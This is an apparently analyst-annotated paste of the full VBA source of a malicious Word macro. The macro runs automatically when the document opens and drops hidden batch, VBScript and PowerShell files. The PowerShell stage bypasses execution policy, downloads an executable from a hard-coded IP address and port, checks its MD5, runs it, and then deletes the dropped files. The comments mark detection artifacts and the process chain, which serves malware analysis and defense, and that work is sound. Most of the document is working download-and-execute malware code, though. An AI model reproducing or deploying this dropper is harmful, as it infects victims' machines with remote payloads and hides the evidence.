dynamoo

Malicious Word macro

Oct 22nd, 2014
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  ' Entry point (analyst note): does nothing except call the dropper routine h.
  ' Auto_Open is the auto-run macro name used by Excel; the AutoOpen and
  ' Workbook_Open subs further down in this listing both forward to it.
  9. Sub Auto_Open()
  10.     h
  11. End Sub
  ' Dropper routine (analyst notes). Writes three files next to the opened
  ' document - ntusersc.ps1, ntuserskk.vbs, ntusersss.bat - marks them hidden and
  ' launches the batch file with a hidden window. Process chain as written below:
  '   Office macro -> ntusersss.bat -> cscript.exe ntuserskk.vbs
  '     -> powershell.exe -ExecutionPolicy bypass -noprofile -file ntusersc.ps1
  '     -> cmd.exe /c crsss2.exe
  ' Detection-relevant artifacts visible here: the three dropped file names,
  ' crsss2.exe, the hard-coded download URL and the expected payload MD5 ($hashroot).
  12. Sub h()
  13. Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR
  ' MY_FILEN / MY_FILE / MY_FIL are assigned but never declared or read again in this listing.
  14.  MY_FILEN = "ntusersc.ps1"
  15.  MY_FILE = "ntusersss.bat"
  16.  MY_FIL = "ntuserskk.vbs"
  ' Drop location is the folder the document was opened from (ActiveDocument.Path).
  17.      MY_FILENDIR = ActiveDocument.Path + "\ntusersc.ps1"
  18.      MY_FILEDIR = ActiveDocument.Path + "\ntusersss.bat"
  19.      MY_FILDIR = ActiveDocument.Path + "\ntuserskk.vbs"
  20.      Dim FileNumber As Integer
  21.      Dim FileNumb As Integer
  22.      Dim FileNu As Integer
  23.      Dim retVal As Variant
  ' NOTE(review): no file is opened between these three FreeFile calls, so they likely
  ' return the same number; each file below is closed before the next one is opened.
  24.      FileNumber = FreeFile
  25.      FileNumb = FreeFile
  26.      FileNu = FreeFile
  ' --- Stage 3: PowerShell script (ntusersc.ps1), written line by line ---
  27.     Open MY_FILENDIR For Output As #FileNumber
  ' Expected MD5 of the payload, in the dash-separated form BitConverter.ToString emits.
  28.     Print #FileNumber, "$hashroot = '13-93-8e-e9-b1-a3-63-63-ed-49-7f-43-3d-5c-a2-c2';"
  29.     Print #FileNumber, "$hash = '0';"
  ' Download over plain HTTP from a hard-coded IP and port via System.Net.WebClient;
  ' the target name crsss2.exe is relative, so it lands in the process working directory.
  30.     Print #FileNumber, "$down = New-Object System.Net.WebClient;"
  31.     Print #FileNumber, "$url  = 'http://162.243.234.167:8080/gr/4.exe';"
  32.     Print #FileNumber, "$file = 'crsss2.exe';"
  33.     Print #FileNumber, "$down.DownloadFile($url,$file);"
  ' NOTE(review): $MyInvocation.ScriptName is concatenated with the file names without
  ' a path separator; what these paths resolve to depends on its runtime value - confirm
  ' in a sandbox before relying on them for artifact locations.
  34.     Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  35.     Print #FileNumber, "$someFilePath = $ScriptDir + 'crsss2.exe';"
  36.     Print #FileNumber, "$vbsFilePath = $ScriptDir + 'ntuserskk.vbs';"
  37.     Print #FileNumber, "$batFilePath = $ScriptDir + 'ntusersss.bat';"
  38.     Print #FileNumber, "$psFilePath = $ScriptDir + 'ntusersc.ps1';"
  ' Polls every 10 seconds, hashing the downloaded file with MD5 until the result
  ' matches $hashroot; the payload is only started after that check passes.
  39.     Print #FileNumber, "Do { Start-Sleep -s 10;"
  40.     Print #FileNumber, "$md5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;"
  41.     Print #FileNumber, "$hash = [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($someFilePath))); }"
  42.     Print #FileNumber, "Until ($hash -Match $hashroot);"
  ' Payload execution through cmd.exe.
  43.     Print #FileNumber, "cmd.exe /c crsss2.exe;"
  ' Clean-up: -bxor toggles the Hidden attribute on the three dropped scripts
  ' (presumably clearing the flag set by SetAttr below so Remove-Item works without -Force).
  44.     Print #FileNumber, "$file1 = gci $vbsFilePath -Force"
  45.     Print #FileNumber, "$file2 = gci $batFilePath -Force"
  46.     Print #FileNumber, "$file3 = gci $psFilePath -Force"
  47.     Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hidden"
  48.     Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hidden"
  49.     Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hidden"
  ' Deletes the VBS, the batch file, the downloaded executable and finally the script
  ' itself, so the dropped files may no longer be on disk when a host is examined.
  50.     Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  51.     Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
  52.     Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
  53.     Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  54.     Close #FileNumber
  55.    
  ' --- Stage 2: VBScript launcher (ntuserskk.vbs) ---
  ' Resolves its own folder, then runs ntusersc.ps1 through powershell.exe with
  ' -ExecutionPolicy bypass -noprofile; Run arguments 0,true mean hidden window, wait for exit.
  ' objFSO is created but not used in the lines written here.
  56.     Open MY_FILDIR For Output As #FileNumb
  57.     Print #FileNumb, "currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
  58.     Print #FileNumb, "Set objFSO=CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
  59.     Print #FileNumb, "currentFile = currentDirectory & " & Chr(34) & "ntusersc.ps1" & Chr(34)
  60.     Print #FileNumb, "Set objShell = CreateObject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"
  61.     Print #FileNumb, "objShell.run " & Chr(34) & "powershell.exe -ExecutionPolicy bypass -noprofile -file " & Chr(34) & " & currentFile,0,true"
  62.     Close #FileNumb
  63.      
  ' --- Stage 1: batch file (ntusersss.bat) ---
  ' The ping line presumably serves as a short delay before cscript.exe starts the VBS.
  64.      'create batch file
  65.    Open MY_FILEDIR For Output As #FileNu
  66.     Print #FileNu, "@echo off"
  67.     Print #FileNu, "ping 1.1.2.2 -n 2"
  68.     Print #FileNu, "cscript.exe " & ActiveDocument.Path & "\ntuserskk.vbs"
  69.     Print #FileNu, "exit"
  70.     Close #FileNu
  71.        
  ' Dir() returns the file name when the path exists, so a non-zero length means the
  ' file was written. The three values are read once here and not refreshed later.
  72.     dir1 = Len(Dir(MY_FILENDIR))
  73.     dir2 = Len(Dir(MY_FILEDIR))
  74.     dir3 = Len(Dir(MY_FILDIR))
  ' Hide all three dropped files from a default Explorer view.
  75.     SetAttr MY_FILENDIR, vbHidden
  76.     SetAttr MY_FILEDIR, vbHidden
  77.     SetAttr MY_FILDIR, vbHidden
  78.    
  ' Wait loops keyed on the lengths captured above; the loop bodies only call WaitFor
  ' and do not re-check the file, so each loop is skipped when the file already existed.
  79.     Do While dir1 = 0
  80.     WaitFor (2)
  81.     Loop
  82.    
  83.     Do While dir2 = 0
  84.     WaitFor (2)
  85.     Loop
  86.    
  87.     Do While dir3 = 0
  88.     WaitFor (2)
  89.     Loop
  90.    
  91.     'Shell "cmd.exe /k " + MY_FILEDIR
  92.    
  ' Starts the batch file; window style 0 hides the console. For detection, an Office
  ' process spawning cmd.exe / cscript.exe / powershell.exe is the observable parent-child chain.
  93.     retVal = Shell(MY_FILEDIR, 0)
  94.    
  95.    
  96.      
  97. End Sub
  ' Delay helper: loops on DoEvents until Timer reaches the value it had on entry
  ' plus NumOfSeconds. Called from h with an argument of 2.
  ' SngSec is declared As Long, so the Timer sum is stored as a whole number.
  98. Sub WaitFor(NumOfSeconds As Long)
  99. Dim SngSec As Long
  100. SngSec = Timer + NumOfSeconds
  101.  
  ' DoEvents yields to the host application so it stays responsive while waiting.
  102. Do While Timer < SngSec
  103. DoEvents
  104. Loop
  105.  
  106. End Sub
  107.  
  ' AutoOpen is the macro name Word runs automatically when a document is opened
  ' with macros enabled; it only forwards to Auto_Open, which calls the dropper h.
  108. Sub AutoOpen()
  109.     Auto_Open
  110. End Sub
  ' Workbook_Open is the Excel workbook-open handler name; it also forwards to Auto_Open.
  ' NOTE(review): this module is named ThisDocument (a Word document module), so this
  ' handler is presumably there to let the same code run from an Excel file - confirm.
  111. Sub Workbook_Open()
  112.     Auto_Open
  113. End Sub